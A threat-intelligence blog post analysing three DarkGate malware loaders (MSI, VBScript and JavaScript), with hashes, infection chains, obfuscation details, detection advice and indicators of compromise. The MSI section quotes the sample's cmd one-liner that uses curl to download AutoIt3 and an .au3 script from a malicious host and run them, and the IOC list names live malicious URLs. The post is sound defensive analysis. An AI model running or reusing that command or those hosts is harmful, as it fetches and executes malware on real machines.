Analyzing DarkGate Loaders

As DarkGate's popularity continues to increase, we've observed several different methods being used to start DarkGate infections. From the initial phishing vector to the first stage loader, threat actors have changed techniques to try and avoid detection and bypass security controls. This blogs examines three different loader types used in recent DarkGate infections.

What is DarkGate?

DarkGate is a piece of commodity malware that has been around since late 2017/early 2018. The malware has the ability to download and execute files, elevate privileges and steal information. In previous years, the malware was disseminated through phishing campaigns. However, recently threat actors have started to leverage Microsoft Teams to send malicious attachments used to start DarkGate infection chains. According to Roman Hüssy from abuse.ch, DarkGate has been used by initial access brokers to provide access into networks for other threat actors, including ransomware groups. 

A ZeroFox briefing from June 2023 indicated that the malware was being advertised on underground forums. The author of the post was advertising access to the malware for a fee. The fees range from US$1000 to US$100,000 based on the actors’ desired duration of access to DarkGate.

Figure 1: A post advertising DarkGate on a forum. Source: ZeroFox

Infection Chains

Analysts have observed different infection chains where DarkGate is used as a payload. The major differences relate to how the initial payload is delivered. Telekom Security observed infection chains where a threat actor sent a phishing payload containing a malicious URL from which an .msi file is downloaded. The .msi file contains the AutoIt3.exe and a .au3 script that contains the shellcode and DarkGate Loader.

Other campaigns deliver a VBScript or JavaScript file that uses curl to download AutoIt3.exe and the .au3 file. In the three samples analysed in this blog, each sample used curl to reach out and download AutoIt3.exe and the .au3 script. At the time of analysis the AutoIt3 and .au3 payloads were no longer available on the URLs within the script.

The diagram below shows the infection chains that we observed. While the .au3 scripts could not be analysed as the payloads were no longer available, the graphic includes how other DarkGate infections use them.

Figure 2: The DarkGate infection chains that have been observed.

Analysis of a DarkGate MSI Loader

The MSI sample analysed as part of this blog can be found on Malware Bazaar. The table below shows information about the sample including hash values and file size.

SHA256

4325d78175a803fb6a1d235e8255816a07283501087e1b115f28c38b6b542856

SHA1

da1d4f989db5eb0cb620a2a337ce180050a07233

MD5

08b7acfc53290cda3cc74fcef70f6e65

ssdeep



12288:ItvRQ+gjpjegGdo8pcQrxugH8KiWhK6nPnf2bWGTHAQCuWI:ItncpVGPWixurKiWhKSf2lhCD

File Size

660.00 kB

First Seen



2023-10-10 11:55:22 UTC

The observed infection chain is shown in figure 3 below.

Figure 3: Execution chain for the .msi sample

The .msi file that starts the DarkGate infection chain is signed and was issued to a company called MK ZN s.r.o and was issued by SSL.com. The serial number of the certificate is 59f296d0af649e0962d724248d9fdcdb. Similar to the samples observed by Telekom, this .msi file was wrapped using a MSI Wrapper from www.exemsi.com.

Figure 4: A dialogue box that appears when running the .msi file. This shows that the file was wrapped using a MSI wrapper from exemsi.com
Figure 5: Code signing certificate used for the .msi file

The .msi file contains two main files:

  • CustomActionDLL
  • WrappedSetupProgram

CustomActionDLL is a DLL that is used to extract the content of the cab file WrappedSetupProgram. The cab files contains two additional files which are:

  • KeyScramblerIE.dll (92372f91137114704b5c7cc10882eced9636997486832c5504551e2ba894cb34)
  • KeyScramblerLogon.exe (fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1)

The DLL is compiled using Borland Delphi and contains exports that relate to the setup and take down of curl. 

Figure 6: Exports present within KeyScramblerIE.dll 

The .msi can be run with msiexec.exe and based on the process chain it expands files contained within the files .cab manifest. The .msi file launches an application called KeyScramblerLogon.exe. While the program crashes, it does generate an error message for the user to see.

Figure 7: Error message that is generated when the .msi file runs

This application contains a valid digital certificate that was issued to QFX software Corporation.

Figure 8: Code signing certificate for KeyScrambler. This data was captured while executing the sample in Any.Run

KeyScrambler is an application marketed as an anti-keylogger solution. It claims to scramble and encrypt keystrokes in order to prevent keyloggers from being able to collect the information a user is entering.

In the sample we looked at, this binary is used to execute cmd.exe which in turn uses curl to download the AutoIt3 executable and the .au3 script that AutoIt3 will execute. This differs from the variants that Telekom security observed in their report, as this sample reached out to download the AutoIt script and executable.

cmd /c cd /d %temp% & curl -o Autoit3.exe http://prestige-castom[.]com:2351 & curl -o hnbidn.au3 http://prestige-castom[.]com:2351/hnbidn & Autoit3.exe hnbidn.au3

Figure 9: The sample runs the following command in an attempt to download the second stage malware.

💡
Note: Another tool that can be used to download files from a malicious domain is Grabbr.

The domain, prestige-castom[.]com, was registered on October 09, 2023 through the Public Domain Registry. The registration date is a day before the sample in the blog was first seen in the wild. There does not appear to be any content hosted on that domain. 

Figure 10: Whois data for the domain that the sample attempts to download from (Accurate as of 19th November 2023 14:32 EST).

Analysis of a DarkGate VBScript Loader

The VBScript sample that is analysed as part of this blog can be found on Malware Bazaar. The following table shows information about the sample including hash values and file size.

SHA256

1e8a6d34c0fe5a5ad2fc1d6ff7000bcf8efa0704c397cb6ef021c2692bf17fe6

SHA1

e2009bb0ccae9b82d57c45d7b6c39d76faded05d

MD5

d050315ff65ebef0ba1352167126592f

ssdeep



768:3IvITQgdN5RyiUiK3IfJO37NwNGFFNWePDUirUif3IhBN67e:3IvI8/e

File Size

26.52 kB

First Seen



2023-10-13 11:17:14 UTC

The observed infection chain is shown in figure 11 below.

Figure 11: Execution chain for the .vbs sample

The loader script contains many functions that are all related to printers. Some of these functions include AddPrinter, DelPrinter and ListPrinter. Searching the function definition on Google leads to a Spiceworks community page that makes reference to a PrinterManager script by Microsoft. It appears that the threat actor used this script to inflate the size of the malicious script and to hopefully confuse and impede analysis by including non-malicious functionality. The PrinterManager script does not actually run as the malicious script is included before it.

Padding or the addition of junk code and text is when an attacker includes a large amount of benign content into a malicious file to either 1) inflate the file size to a point where automated security scanning does not take place or 2) hinder analysis by forcing analysts to look through more lines of text to understand what the intended functionality is. 
Figure 12: The content of the VBScript that is executed

The script starts off by checking if the filename contains vbs, and if so it stores the full path of the script in the path variable. The commented section in green text contains the obfuscated command that is executed by the ShellExecute command.

Using the find/replace recipe in CyberChef, we can view the deobfuscated command. 

Figure 13: CyberChef showing the deobfuscated command
💡
CyberChef is an excellent open-source tool that allows analysts to quickly perform analysis on artifacts based on predefined operations. These operations can be combined into "recipes" that decode or transform more complicated data. Common uses of CyberChef include base64 operations, xor, and the encryption/decryption of data.

This command is using cmd and first changes from the current directory to the %temp% directory and then attempts to download the .au3 script.

Analysis of a DarkGate JavaScript Loader

The JavaScript sample analysed as part of this blog can be found on Malware Bazaar. The table below shows information about the sample including hash values and file size.

SHA256

21cbf06080ae61f95617b3f65f85af5a1390133af6c5c516ac251f9f9cde7fa7

SHA1

96b24cfafc899c611fbf10cd71c2ea164d494498

MD5

57cfc3b0b53e856c78b47867d7013516

ssdeep



768:xu5lDXfNaS8QzGeEU05ZDU9C6GSeIf+y5af1y/W5xkV8NXP4a7H++ffchuR5M3Q:TB0Gh1y/q/H

File Size

35.51 kB

First Seen



2023-10-13 11:17:14 UTC

The observed infection chain is shown in figure 14 below.

Figure 14: Execution chain for the .js sample

The JavaScript loader analysed was heavily obfuscated and contains many functions that are not used. 

Figure 15: Junk code in the Javascript file that is not executed

The key part of the script is contained in an array of characters that is used to craft the download string. An ActiveXObject uses curl to download the AutoIt stage of the infection.

Figure 16: Array that holds the characters used to create the domain the sample reached out to.

The actual command to be executed is created using string concatenation when single characters are selected from the aNedSM array based on their position in the array. The execute command is similar to the one seen in the VBScript where the script first changes into the %temp% directory before using curl to download AutoIt and the .au3 script.

Figure 17: The code used to create the cmd command used to download .au3 script and execute it

Conclusion

As DarkGate continues to increase in popularity with threat actors, security researchers are observing use of different vectors to download and execute DarkGate. While sending zip archives via email is a vector more commonly guarded against, threat actors have adopted other mechanisms as well. As a result, defenders need to monitor additional communication channels for initial delivery. This includes Microsoft Teams where threat actors are able to abuse configurations which allow users to receive messages from users external to their organisation. One common feature between observed DarkGate infection chains is the use of AutoIt3. 

Recommendations

  • Block or limit external domains on Applications such as Teams or Skype
    • Blocking all external domains or only allowing specific external domains to message users within an organisation helps prevent users from receiving messages or files from unknown entities.
  • Monitor for the execution of cmd or curl from scripting interpreters
    • To alert on potentially malicious VBScript or JavaScript files attempting to download additional payloads, defenders can monitor for cscript.exe or wscript.exe launching native binaries such as cmd or curl. 

Indicators of Compromise

The table below contains a partial list of DarkGate network IOCs identified and added to the Pulsedive platform. This data and the full list of 200+ IOCs can be queried in Pulsedive using the Explore query threat="DarkGate" and is available for export in multiple formats (CSV, STIX 2.1, JSON).

IOCs identified during the analysis in this blog include:

DarkGate IOCs

4325d78175a803fb6a1d235e8255816a07283501087e1b115f28c38b6b542856

http://prestige-castom.com:2351/hnbidn

1e8a6d34c0fe5a5ad2fc1d6ff7000bcf8efa0704c397cb6ef021c2692bf17fe6

http://whoernet.co.com:80/msifvwjscyk

http://whoernet.co.com:80/msikatqayts

http://prestige-castom.com:2351

92372f91137114704b5c7cc10882eced9636997486832c5504551e2ba894cb34

http://whoernet.co.com:80

21cbf06080ae61f95617b3f65f85af5a1390133af6c5c516ac251f9f9cde7fa7

References